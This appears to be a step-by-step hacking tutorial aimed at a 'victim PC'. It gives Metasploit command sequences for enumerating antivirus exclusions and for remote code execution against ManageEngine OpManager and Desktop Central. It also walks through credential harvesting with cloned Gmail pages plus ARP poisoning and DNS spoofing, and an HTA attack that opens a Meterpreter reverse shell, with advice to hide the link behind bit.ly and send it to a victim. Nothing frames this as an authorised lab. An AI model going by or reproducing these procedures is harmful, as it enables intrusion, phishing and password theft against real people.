How to Gather Information of Antivirus in Remote Victim PC using Metasploit

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/gather/enum_av_excluded

msf exploit (enum_av_excluded)>set lhost 192.168.0.105 (IP of Local Host)

msf exploit (enum_av_excluded)>set session 1

msf exploit (enum_av_excluded)>exploit

Hack Remote Windows PC using ManageEngine OpManager Remote Code Execution

This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which can not be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows.

Exploit Targets

Windows 7

ManageEngine OpManager v11.6

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/http/manage_engine_opmanager_rce

msf exploit (manage_engine_opmanager_rce)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (manage_engine_opmanager_rce)>set rhost 192.168.0.104

msf exploit (manage_engine_opmanager_rce)>exploit

Hack Remote Windows PC Manage Engine Desktop Central 9 File Upload Servlet Connection Id Vulnerability

This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null bye at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. Please note that by default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file rdslog0.txt. This exploit was successfully tested on version 9, build 90109 and build 91084

Exploit Targets

Windows 7

ManageEngine Desktop Central 9

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/http/manageengine_connectionid_write

msf exploit (manageengine_connectionid_write)>set lhost 192.168.1.33 (IP of Local Host)

msf exploit (manageengine_connectionid_write)>set rhost 192.168.1.4

msf exploit (manageengine_connectionid_write)>exploit

Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit.

First open your kali Linux application tab in Exploitation Tools and then chose SET Toolkit

Now choose option 1, “Social – Engineering Attacks” and Enter

Then choose option 2, “Website Attack Vectors” and Enter

After that choose option 3, “Credential Harvester Attack Method” and Enter

Now choose option 2 Site Cloner and press Enter

For Post back type your IP address and press Enter, After that type the website name you want to be Clone (in my case I am using gmail )

Cloned web page will be saving in /var/www Folder. As shown below.

Now move cloned files of fake page (e.g. Harvester, post & index.html) in /var/www/html folder.

Now right click on harvester .txt file and give read and write permission.

Now open etter.dns file which is in /etc/ettercap folder.

Modify the contents of the etter.dns and add your own pc IP address as A record.

Now Open Ettercap and go to Sniff and choose Unified sniffing.

Select you network interface (in my case interface is eth0)

Now go to hosts and select Scan for hosts. It will show you the connected PC in your network.

Select host list and select your Target after that click on Add to Target 1 (if you want to select more than 1 target then select the target again and click on Add to Target again )

Open Mitm option and select ARP poisoning...

It will give you a Pop up in which select the Sniff remote connection box and hit OK.

Select Plugins and choose Manage the plugins.

IN Plugins option double click on dns_spoof. (It will start DNS spoofing)

Click on start and select Start sniffing

Now, when the victim will open any web page, the page will redirect it to the Fake page you created.

When victim will put there Id & Password, will get all the details.

The Hacked ID & Password of Victim will get saved in /var/www/html/harvester.txt. As shown below.

Hack Remote PC using HTA Attack in SET Toolkit

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

First open your kali Linux application tab in Post Exploitation chose SET Toolkit

Now choose option 1, “Social – Engineering Attacks”

Now choose option 2, “Website Attack Vectors”

Now choose option 8, “HTA Attack Method”

Enter the IP address to connect back on: 192.168.0.125 (IP address of Your PC)

Now select the payload I choose 1 Meterpreter reverse TCP.

Now we will choose option 2, “Site Cloner and type the site name you want to be clone. Nad starting MSF listener automatically

Now you will get index.html and launcher.hta in /var/www directory.

Now move both file to var/www/html directory.

Now convert your URL into Bitly URL using bit.ly and send this link address to your victim via Email or Chat

When Victim Machine browsing to bitly URL it will ask you for Prompt to keep/Discard

Now you will get the meterpreter of victim PC. Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.